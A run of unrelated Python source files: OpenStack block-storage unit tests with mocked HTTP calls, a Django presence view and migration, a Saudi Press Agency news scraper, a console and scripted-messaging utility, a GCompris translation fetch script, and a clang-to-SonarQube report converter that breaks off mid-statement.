import testtools

import openstack.cloud
from openstack.cloud import meta
from openstack.tests import fakes
from openstack.tests.unit import base


class TestVolume(base.TestCase):
    """Unit tests for the cloud layer's block-storage (volume) operations.

    Each test registers the exact HTTP interactions it expects via
    ``register_uris`` and finishes with ``assert_calls`` to verify that
    every registered call (and no other) was made.
    """

    def test_attach_volume(self):
        """Attaching with wait=False returns the raw attachment dict."""
        server = dict(id='server001')
        vol = {'id': 'volume001', 'status': 'available',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        rattach = {'server_id': server['id'], 'device': 'device001',
                   'volumeId': volume['id'], 'id': 'attachmentId'}
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments']),
                 json={'volumeAttachment': rattach},
                 validate=dict(json={
                     'volumeAttachment': {
                         'volumeId': vol['id']}})
                 )])
        ret = self.cloud.attach_volume(server, volume, wait=False)
        self.assertEqual(rattach, ret)
        self.assert_calls()

    def test_attach_volume_exception(self):
        """A 404 from the attach POST surfaces as OpenStackCloudURINotFound."""
        server = dict(id='server001')
        vol = {'id': 'volume001', 'status': 'available',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments']),
                 status_code=404,
                 validate=dict(json={
                     'volumeAttachment': {
                         'volumeId': vol['id']}})
                 )])
        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudURINotFound,
            "Error attaching volume %s to server %s" % (
                volume['id'], server['id'])
        ):
            self.cloud.attach_volume(server, volume, wait=False)
        self.assert_calls()

    def test_attach_volume_wait(self):
        """Default wait=True polls volume detail until the attach shows up."""
        server = dict(id='server001')
        vol = {'id': 'volume001', 'status': 'available',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        # second fake: same volume after the attachment has completed
        vol['attachments'] = [{'server_id': server['id'],
                               'device': 'device001'}]
        vol['status'] = 'attached'
        attached_volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        rattach = {'server_id': server['id'], 'device': 'device001',
                   'volumeId': volume['id'], 'id': 'attachmentId'}
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments']),
                 json={'volumeAttachment': rattach},
                 validate=dict(json={
                     'volumeAttachment': {
                         'volumeId': vol['id']}})),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [attached_volume]})])
        # defaults to wait=True
        ret = self.cloud.attach_volume(server, volume)
        self.assertEqual(rattach, ret)
        self.assert_calls()

    def test_attach_volume_wait_error(self):
        """A volume that polls back in 'error' state raises while waiting."""
        server = dict(id='server001')
        vol = {'id': 'volume001', 'status': 'available',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        vol['status'] = 'error'
        errored_volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        rattach = {'server_id': server['id'], 'device': 'device001',
                   'volumeId': volume['id'], 'id': 'attachmentId'}
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments']),
                 json={'volumeAttachment': rattach},
                 validate=dict(json={
                     'volumeAttachment': {
                         'volumeId': vol['id']}})),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [errored_volume]})])

        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudException,
            "Error in attaching volume %s" % errored_volume['id']
        ):
            self.cloud.attach_volume(server, volume)
        self.assert_calls()

    def test_attach_volume_not_available(self):
        """Attaching a non-available volume fails before any HTTP call."""
        server = dict(id='server001')
        volume = dict(id='volume001', status='error', attachments=[])

        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudException,
            "Volume %s is not available. Status is '%s'" % (
                volume['id'], volume['status'])
        ):
            self.cloud.attach_volume(server, volume)
        self.assertEqual(0, len(self.adapter.request_history))

    def test_attach_volume_already_attached(self):
        """Attaching to a server it's already on fails before any HTTP call."""
        device_id = 'device001'
        server = dict(id='server001')
        volume = dict(id='volume001',
                      attachments=[
                          {'server_id': 'server001', 'device': device_id}
                      ])

        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudException,
            "Volume %s already attached to server %s on device %s" % (
                volume['id'], server['id'], device_id)
        ):
            self.cloud.attach_volume(server, volume)
        self.assertEqual(0, len(self.adapter.request_history))

    def test_detach_volume(self):
        """Detaching with wait=False issues a single DELETE."""
        server = dict(id='server001')
        volume = dict(id='volume001',
                      attachments=[
                          {'server_id': 'server001', 'device': 'device001'}
                      ])
        self.register_uris([
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments', volume['id']]))])
        self.cloud.detach_volume(server, volume, wait=False)
        self.assert_calls()

    def test_detach_volume_exception(self):
        """A 404 from the detach DELETE surfaces as OpenStackCloudURINotFound."""
        server = dict(id='server001')
        volume = dict(id='volume001',
                      attachments=[
                          {'server_id': 'server001', 'device': 'device001'}
                      ])
        self.register_uris([
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments', volume['id']]),
                 status_code=404)])
        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudURINotFound,
            "Error detaching volume %s from server %s" % (
                volume['id'], server['id'])
        ):
            self.cloud.detach_volume(server, volume, wait=False)
        self.assert_calls()

    def test_detach_volume_wait(self):
        """Default detach polls volume detail until it is available again."""
        server = dict(id='server001')
        attachments = [{'server_id': 'server001', 'device': 'device001'}]
        vol = {'id': 'volume001', 'status': 'attached', 'name': '',
               'attachments': attachments}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        vol['status'] = 'available'
        vol['attachments'] = []
        avail_volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments', volume.id])),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [avail_volume]})])
        self.cloud.detach_volume(server, volume)
        self.assert_calls()

    def test_detach_volume_wait_error(self):
        """A volume that polls back in 'error' state raises while waiting."""
        server = dict(id='server001')
        attachments = [{'server_id': 'server001', 'device': 'device001'}]
        vol = {'id': 'volume001', 'status': 'attached', 'name': '',
               'attachments': attachments}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        vol['status'] = 'error'
        vol['attachments'] = []
        errored_volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'compute', 'public',
                     append=['servers', server['id'],
                             'os-volume_attachments', volume.id])),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [errored_volume]})])
        with testtools.ExpectedException(
            openstack.cloud.OpenStackCloudException,
            "Error in detaching volume %s" % errored_volume['id']
        ):
            self.cloud.detach_volume(server, volume)
        self.assert_calls()

    def test_delete_volume_deletes(self):
        """Successful delete returns True after the volume disappears."""
        vol = {'id': 'volume001', 'status': 'attached',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', volume.id])),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': []})])
        self.assertTrue(self.cloud.delete_volume(volume['id']))
        self.assert_calls()

    def test_delete_volume_gone_away(self):
        """A 404 on DELETE (already gone) makes delete_volume return False."""
        vol = {'id': 'volume001', 'status': 'attached',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='DELETE',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', volume.id]),
                 status_code=404)])
        self.assertFalse(self.cloud.delete_volume(volume['id']))
        self.assert_calls()

    def test_delete_volume_force(self):
        """force=True uses the os-force_delete action instead of DELETE."""
        vol = {'id': 'volume001', 'status': 'attached',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', volume.id, 'action']),
                 validate=dict(
                     json={'os-force_delete': None})),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': []})])
        self.assertTrue(self.cloud.delete_volume(volume['id'], force=True))
        self.assert_calls()

    def test_set_volume_bootable(self):
        """Default call posts os-set_bootable with bootable=True."""
        vol = {'id': 'volume001', 'status': 'attached',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', volume.id, 'action']),
                 json={'os-set_bootable': {'bootable': True}}),
        ])
        self.cloud.set_volume_bootable(volume['id'])
        self.assert_calls()

    def test_set_volume_bootable_false(self):
        """Same action endpoint, with bootable=False in the body."""
        vol = {'id': 'volume001', 'status': 'attached',
               'name': '', 'attachments': []}
        volume = meta.obj_to_munch(fakes.FakeVolume(**vol))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes', 'detail']),
                 json={'volumes': [volume]}),
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', volume.id, 'action']),
                 json={'os-set_bootable': {'bootable': False}}),
        ])
        self.cloud.set_volume_bootable(volume['id'])
        self.assert_calls()

    def test_list_volumes_with_pagination(self):
        """list_volumes follows volumes_links 'next' hrefs until exhausted."""
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        vol2 = meta.obj_to_munch(fakes.FakeVolume('02', 'available', 'vol2'))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail']),
                 json={
                     'volumes': [vol1],
                     'volumes_links': [
                         {'href': self.get_mock_url(
                             'volumev2', 'public',
                             append=['volumes', 'detail'],
                             qs_elements=['marker=01']),
                          'rel': 'next'}]}),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail'],
                     qs_elements=['marker=01']),
                 json={
                     'volumes': [vol2],
                     'volumes_links': [
                         {'href': self.get_mock_url(
                             'volumev2', 'public',
                             append=['volumes', 'detail'],
                             qs_elements=['marker=02']),
                          'rel': 'next'}]}),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail'],
                     qs_elements=['marker=02']),
                 json={'volumes': []})])
        self.assertEqual(
            [self.cloud._normalize_volume(vol1),
             self.cloud._normalize_volume(vol2)],
            self.cloud.list_volumes())
        self.assert_calls()

    def test_list_volumes_with_pagination_next_link_fails_once(self):
        """One 404 on a next link restarts pagination from the beginning."""
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        vol2 = meta.obj_to_munch(fakes.FakeVolume('02', 'available', 'vol2'))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail']),
                 json={
                     'volumes': [vol1],
                     'volumes_links': [
                         {'href': self.get_mock_url(
                             'volumev2', 'public',
                             append=['volumes', 'detail'],
                             qs_elements=['marker=01']),
                          'rel': 'next'}]}),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail'],
                     qs_elements=['marker=01']),
                 status_code=404),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail']),
                 json={
                     'volumes': [vol1],
                     'volumes_links': [
                         {'href': self.get_mock_url(
                             'volumev2', 'public',
                             append=['volumes', 'detail'],
                             qs_elements=['marker=01']),
                          'rel': 'next'}]}),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail'],
                     qs_elements=['marker=01']),
                 json={
                     'volumes': [vol2],
                     'volumes_links': [
                         {'href': self.get_mock_url(
                             'volumev2', 'public',
                             append=['volumes', 'detail'],
                             qs_elements=['marker=02']),
                          'rel': 'next'}]}),

            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail'],
                     qs_elements=['marker=02']),
                 json={'volumes': []})])
        self.assertEqual(
            [self.cloud._normalize_volume(vol1),
             self.cloud._normalize_volume(vol2)],
            self.cloud.list_volumes())
        self.assert_calls()

    def test_list_volumes_with_pagination_next_link_fails_all_attempts(self):
        """After every retry 404s, the volumes found so far are returned."""
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        uris = []
        attempts = 5
        for i in range(attempts):
            uris.extend([
                dict(method='GET',
                     uri=self.get_mock_url(
                         'volumev2', 'public',
                         append=['volumes', 'detail']),
                     json={
                         'volumes': [vol1],
                         'volumes_links': [
                             {'href': self.get_mock_url(
                                 'volumev2', 'public',
                                 append=['volumes', 'detail'],
                                 qs_elements=['marker=01']),
                              'rel': 'next'}]}),
                dict(method='GET',
                     uri=self.get_mock_url(
                         'volumev2', 'public',
                         append=['volumes', 'detail'],
                         qs_elements=['marker=01']),
                     status_code=404)])
        self.register_uris(uris)
        # Check that found volumes are returned even if pagination didn't
        # complete because call to get next link 404'ed for all the allowed
        # attempts
        self.assertEqual(
            [self.cloud._normalize_volume(vol1)],
            self.cloud.list_volumes())
        self.assert_calls()

    def test_get_volume_by_id(self):
        """Direct GET of volumes/<id> returns the normalized volume."""
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        self.register_uris([
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', '01']),
                 json={'volume': vol1}
                 )
        ])
        self.assertEqual(
            self.cloud._normalize_volume(vol1),
            self.cloud.get_volume_by_id('01'))
        self.assert_calls()

    def test_create_volume(self):
        """create_volume POSTs size/name then re-lists volume detail."""
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes']),
                 json={'volume': vol1},
                 validate=dict(json={
                     'volume': {
                         'size': 50,
                         'name': 'vol1',
                     }})),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail']),
                 json={'volumes': [vol1]}),
        ])

        self.cloud.create_volume(50, name='vol1')
        self.assert_calls()

    def test_create_bootable_volume(self):
        """bootable=True adds an os-set_bootable action after creation."""
        vol1 = meta.obj_to_munch(fakes.FakeVolume('01', 'available', 'vol1'))
        self.register_uris([
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public', append=['volumes']),
                 json={'volume': vol1},
                 validate=dict(json={
                     'volume': {
                         'size': 50,
                         'name': 'vol1',
                     }})),
            dict(method='GET',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', 'detail']),
                 json={'volumes': [vol1]}),
            dict(method='POST',
                 uri=self.get_mock_url(
                     'volumev2', 'public',
                     append=['volumes', '01', 'action']),
                 validate=dict(
                     json={'os-set_bootable': {'bootable': True}})),
        ])

        self.cloud.create_volume(50, name='vol1', bootable=True)
        self.assert_calls()

#!/usr/bin/python

from django.http import HttpResponse
from django.template import RequestContext, loader
from django.views.decorators.csrf import csrf_exempt
import django.shortcuts

from wlokalu.api import presence

#-----------------------------------------------------------------------------

from wlokalu.logging import getLogger, message as log
logger = getLogger(__name__)

#-----------------------------------------------------------------------------

@csrf_exempt
def list(request, nick = None):
  """Render the presence page and handle enter/leave form submissions.

  On a POST with a non-empty ``nick`` the presence API is notified and
  the browser is redirected back to the same path (POST-redirect-GET).
  Otherwise the page is rendered with the current presence state.

  NOTE(review): the view name shadows the builtin ``list`` but is also
  used as a reverse() target below, so renaming would touch the URLconf.
  """
  template = loader.get_template("list.html")

  # Imported inside the view, presumably to avoid import-time cycles --
  # verify before hoisting to module level.
  from django.core.urlresolvers import reverse
  from forms import PresenceForm
  form = PresenceForm()
  if nick is not None:
    # Pre-fill the form and post back to the per-nick URL.
    form.initial['nick'] = nick
    form_target = reverse(list, kwargs = {'nick': nick})
  else:
    form_target = reverse(list)

  if request.POST.get('nick', '') != '':
    # Request context handed to the presence API (origin of the event).
    # NOTE(review): REQUEST_URI is set by some servers only (not a
    # guaranteed WSGI key) -- confirm it exists in this deployment.
    context = {
      'address': request.META['REMOTE_ADDR'],
      'uri': request.META['REQUEST_URI'],
    }
    if 'enter' in request.POST:
      presence.person_entered(request.POST['nick'], context)
    else: # 'leave' in request.POST
      presence.person_left(request.POST['nick'], context)
    # tell the browser to reload the page, but with GET request
    return django.shortcuts.redirect(request.path)

  context = RequestContext(request, {
    'form_target': form_target,
    'form': form,
    'present': presence.list_people(),
    'sensors': presence.list_simple_sensors(),
    'complex_sensors': presence.list_complex_sensors(),
  })
  return HttpResponse(template.render(context))

#-----------------------------------------------------------------------------
# vim:ft=python:foldmethod=marker

from urllib.request import urlopen
from urllib.parse import urlparse, parse_qs
from socket import error as SocketError
import errno
from bs4 import BeautifulSoup

MAX_PAGES_TO_SEARCH = 3

def parse_news(item):
    '''Parse a single news anchor element.

    Returns a tuple ``(id, title, url)`` where the id comes from the
    ``newsid`` query-string parameter and the title has its whitespace
    collapsed.
    '''
    full_url = 'http://www.spa.gov.sa' + item['href']
    query = parse_qs(urlparse(full_url)[4])
    news_id = query['newsid'][0]
    headline = " ".join(item.h2.contents[0].split())
    return (news_id, headline, full_url)


def retrieve_news(person=0, royal=0, cabinet=0,  last_id=-1):
    '''Retrieve news for a person, royal orders, or cabinet decisions.

    person: 1 = king, 2 = crown prince, 3 = deputy crown prince.
    royal=1 retrieves royal orders; cabinet=1 retrieves cabinet decisions.
    Items are returned newest-first; fetching stops at the first item
    whose id is <= last_id, so the default last_id=-1 returns everything
    found. Scans at most MAX_PAGES_TO_SEARCH pages (10 items per page).
    Returns a list of (id, title, url) tuples.
    '''
    all_news = []
    found = False
    page = 1
    while (page <= MAX_PAGES_TO_SEARCH and not found):
        url = ("http://www.spa.gov.sa/ajax/listnews.php?sticky={}&cat=0&cabine"
        "t={}&royal={}&lang=ar&pg={}".format(person, cabinet, royal,  page))
        try:
            html = urlopen(url)
            soup = BeautifulSoup(html, "html.parser")
            news = soup.find_all("a", class_="aNewsTitle")
            for item in news:
                item_parsed = parse_news(item)
                # BUG FIX: ids were compared as strings, which is
                # lexicographic ('9' > '10'); compare numerically.
                # Assumes newsid is always numeric -- TODO confirm.
                if int(item_parsed[0]) <= int(last_id):
                    found = True
                    break
                all_news.append(item_parsed)
        except SocketError as e:
            # Tolerate connection resets (try the next page);
            # re-raise any other socket error.
            if e.errno != errno.ECONNRESET:
                raise
        page = page + 1
    return all_news


def retrieve_detail(item):
    '''Fetch the full body text for a news tuple.

    Takes an (id, title, url) tuple and returns (id, title, url, text).
    '''
    page = urlopen(item[2])
    soup = BeautifulSoup(page, 'html.parser')
    body_text = soup.find(class_='divNewsDetailsText').get_text()
    enriched = list(item)
    enriched.insert(3, body_text)
    return tuple(enriched)


def royal_order(last_id=-1):
    '''Retrieve royal orders together with their full text.

    With the default last_id=-1 everything found is returned, scanning
    at most MAX_PAGES_TO_SEARCH pages (10 items per page).
    Returns a list of (id, title, url, text) tuples.
    '''
    return [retrieve_detail(item)
            for item in retrieve_news(royal=1, last_id=last_id)]


def cabinet_decision(last_id=-1):
    '''Retrieve cabinet decisions together with their full text.

    With the default last_id=-1 everything found is returned, scanning
    at most MAX_PAGES_TO_SEARCH pages (10 items per page).
    Returns a list of (id, title, url, text) tuples.
    '''
    return [retrieve_detail(item)
            for item in retrieve_news(cabinet=1, last_id=last_id)]


def arrival_news(person, last_id=-1):
    '''Filter the person's news down to arrival items.

    The location is the text between the arrival phrase and the
    "coming from" phrase in the title.
    Returns a list of (id, title, url, location) tuples.
    '''
    arrivals = []
    for news_id, title, url in retrieve_news(person=person, last_id=last_id):
        if 'يصل إلى' in title:
            location = title.split('يصل إلى')[1].split('قادماً من')[0]
            arrivals.append((news_id, title, url, location))
    return arrivals


def leave_news(person, last_id=-1):
    '''Filter the person's news down to departure items.

    The locationFromTo element is the title text after the departure
    phrase. Returns a list of (id, title, url, locationFromTo) tuples.
    '''
    departures = []
    for news_id, title, url in retrieve_news(person=person, last_id=last_id):
        if 'يغادر' in title:
            departures.append((news_id, title, url, title.split('يغادر')[1]))
    return departures


if __name__ == "__main__":
    # Manual smoke test: fetch the latest cabinet decisions and dump them.
    news = cabinet_decision()
    print(news)

import time
from threading import Thread
import threading
from wtfj_ids import *
from wtfj_utils import *

class Printer:
	''' Opens a new output window and prints messages sent to it '''

	def __init__(self, header=''):
		# Prefix prepended to every outgoing message.
		self._header = header

	def send(self, string):
		'''Print *string* with the configured header prefix.'''
		print(self._header + string)

class Console:
	''' Allows user to enter commands '''

	def __init__(self, prompt='[$] '):
		self._prompt = prompt
		self._at = ''  # sticky '@uid ' prefix applied to bare messages

	def poll(self, wait_s=None, uid=None):
		'''Read one line from the user and return it as a one-item list.

		A blank line clears the sticky prefix and yields []. A line
		starting with '@' sets the prefix; other lines inherit it.
		Any error is printed and swallowed, yielding [].
		'''
		try:
			msg = raw_input(str(self._at) + str(self._prompt))
			if msg == '':
				self._at = ''
				return []
			if msg.startswith('@'):
				# Remember the target; later bare messages inherit it.
				self._at = msg.split()[0] + ' '
			else:
				msg = self._at + msg
			return [msg]
		except Exception as e:
			print(repr(e))
			return []

	def subscribe(self, *uids):
		'''No-op: a console has nothing to subscribe to.'''
		pass

class Script:
	''' Runs a script passed as a list, default frequency = 1000Hz '''

	def __init__(self, msgs):
		self._msgs = msgs
		self._index = 0
		self._period = 0.001  # seconds between messages (1000 Hz)
		self._pid = 'SCRIPT'  # replaced with the thread id/name in run()

	def poll(self, wait_s=None, uid=None):
		'''Sleep one period, then return the next message as a one-item
		list, or [] once the script is exhausted.'''
		period = self._period if wait_s is None else wait_s
		time.sleep(period)
		try:
			msg = self._msgs[self._index]
			print(self._pid + ' SEND > ' + msg)
			self._index += 1
			return [msg]
		except IndexError:
			return []

	def subscribe(self, *uids):
		'''Assert every non-None uid (bare or @-prefixed) is a known Uid
		attribute; returns self for chaining.'''
		for uid in uids:
			if uid is not None:
				# BUG FIX: was "uid[0] is '@'" -- string identity is
				# implementation-dependent; compare by value instead.
				if uid[0] == '@':
					assert uid[1:] in get_attr(Uid)
				else:
					assert uid in get_attr(Uid)
		return self

	def load(self, msg_array):
		'''Append more messages to the script; returns self.'''
		self._msgs += msg_array
		return self

	def set_period(self, period):
		'''Set the inter-message delay in seconds; returns self.'''
		self._period = period
		return self

	def run(self):
		'''Drain the script synchronously, tagging output with the thread.'''
		t = threading.current_thread()
		self._pid = str(t.ident) + ' ' + str(t.name)
		while len(self.poll()) > 0:
			pass

	def run_async(self):
		'''Drain the script on a freshly started daemon-less thread.'''
		Thread(target=self.run).start()


if __name__ == '__main__':

	# Demo: a plain printer, a synchronous script, and two async scripts.
	Printer('A simple printer: ').send('Just printing a msg to current_thread')

	script = [
		'@other_uid topic data',
		'@other_uid topic',
		'uid topic data',
		'uid topic'
	]

	# BUG FIX: renamed from "async"/"async2" -- "async" became a reserved
	# keyword in Python 3.7 and no longer parses as an identifier.
	async_msgs = ['async topic '+str(n) for n in [1,2,3,4,5,6,7,8,9,0]]
	async_msgs2 = ['async2 topic '+str(n) for n in [1,2,3,4,5,6,7,8,9,0]]

	Script(script).set_period(1).run()
	Script(async_msgs).set_period(0.15).run_async()
	Script(async_msgs2).set_period(0.2).run_async()
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-03 08:56
from __future__ import unicode_literals

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    # Auto-generated schema migration: creates Inscription and Profile and
    # wires Journey <-> Profile as a many-to-many through Inscription.
    # NOTE: field definitions are derived from model state at generation
    # time and should not be edited by hand.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('snapventure', '0004_auto_20161102_2043'),
    ]

    operations = [
        migrations.CreateModel(
            name='Inscription',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('last_updated', models.DateTimeField(auto_now=True)),
                ('journey', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snapventure.Journey')),
            ],
        ),
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('bio', models.TextField(blank=True, max_length=500)),
                ('location', models.CharField(blank=True, max_length=30)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.AddField(
            model_name='inscription',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snapventure.Profile'),
        ),
        migrations.AddField(
            model_name='journey',
            name='inscriptions',
            field=models.ManyToManyField(through='snapventure.Inscription', to='snapventure.Profile'),
        ),
    ]

import os
import re
import subprocess

# Copied from Trojita
"""Fetch the .po files from KDE's SVN for GCompris

Run me from GCompris's top-level directory.
"""


SVN_PATH = "svn://anonsvn.kde.org/home/kde/trunk/l10n-kf5/"
SOURCE_PO_PATH = "/messages/kdereview/gcompris_qt.po"
OUTPUT_PO_PATH = "./po/"
OUTPUT_PO_PATTERN = "gcompris_%s.po"

fixer = re.compile(r'^#~\| ', re.MULTILINE)
re_empty_msgid = re.compile('^msgid ""$', re.MULTILINE)
re_empty_line = re.compile('^$', re.MULTILINE)
re_has_qt_contexts = re.compile('X-Qt-Contexts: true\\n')

if not os.path.exists(OUTPUT_PO_PATH):
    os.mkdir(OUTPUT_PO_PATH)

all_languages = subprocess.check_output(['svn', 'cat', SVN_PATH + 'subdirs'],
                                       stderr=subprocess.STDOUT)

all_languages = [x.strip() for x in all_languages.split("\n") if len(x)]
all_languages.remove("x-test")
for lang in all_languages:
    try:
        raw_data = subprocess.check_output(['svn', 'cat', SVN_PATH + lang + SOURCE_PO_PATH],
                                          stderr=subprocess.PIPE)
        (transformed, subs) = fixer.subn('# ~| ', raw_data)
        pos1 = re_empty_msgid.search(transformed).start()
        pos2 = re_empty_line.search(transformed).start()
        if re_has_qt_contexts.search(transformed, pos1, pos2) is None:
            transformed = transformed[:pos2] + \
                    '"X-Qt-Contexts: true\\n"\n' + \
                    transformed[pos2:]
            subs = subs + 1
        if (subs > 0):
            print "Fetched %s (and performed %d cleanups)" % (lang, subs)
        else:
            print "Fetched %s" % lang
        file(OUTPUT_PO_PATH + OUTPUT_PO_PATTERN % lang, "wb").write(transformed)
    except subprocess.CalledProcessError:
        print "No data for %s" % lang

# Inform qmake about the updated file list
#os.utime("CMakeLists.txt", None)


#! /usr/bin/python

from xml.sax.saxutils import escape
import re

def ConvertDiagnosticLineToSonqarqube(item):
    try:
        id, line, message, source_file = GetDiagnosticFieldsFromDiagnosticLine(item)
        WriteDiagnosticFieldsToFile(id, line, message, source_file)
    except:
        print 'Cant parse line {}'.format(item)


def GetDiagnosticFieldsFromDiagnosticLine(item):
    """Extract (id, line, message, source_file) from a clang warning line.

    Expected shape: ``/path/file.cpp:LINE:COL: warning: MESSAGE [flag]``.
    Raises AttributeError when a component is missing (the caller
    catches and reports it).
    """
    # FIX: use raw strings -- '\d' etc. in plain literals are invalid
    # escapes (a warning today, an error in future Python versions).
    source_file = re.search(r'/(.*?):', item).group(0).replace(':', '')
    line = re.search(r':\d*:', item).group(0).replace(':', '')
    id = re.search(r'\[.*\]', item).group(0).replace('[', '').replace(']', '') + '-clang-compiler'
    message = re.search(r'warning: (.*)\[', item).group(0).replace('[', '').replace('warning: ', '')
    return id, line, message, source_file


def WriteDiagnosticFieldsToFile(id, line, message, source_file):
    """Append one <error .../> element to the global report file.

    Only the message is XML-escaped; the other fields are expected to be
    plain paths/numbers/identifiers.
    """
    parts = [' <error file="', str(source_file),
             '" line="', str(line),
             '" id="', str(id),
             '" msg="', escape(str(message)), '"/>\n']
    clang_sonar_report.write(''.join(parts))


def CreateOutputFile():
    """Create the XML report, write its header, and return the open handle.

    The handle stays open for the writer helpers; CloseOutputFile()
    writes the footer and closes it.
    """
    report = open('clang_compiler_report.xml', 'w')
    report.write('<?xml version="1.0" encoding="UTF-8"?>\n'
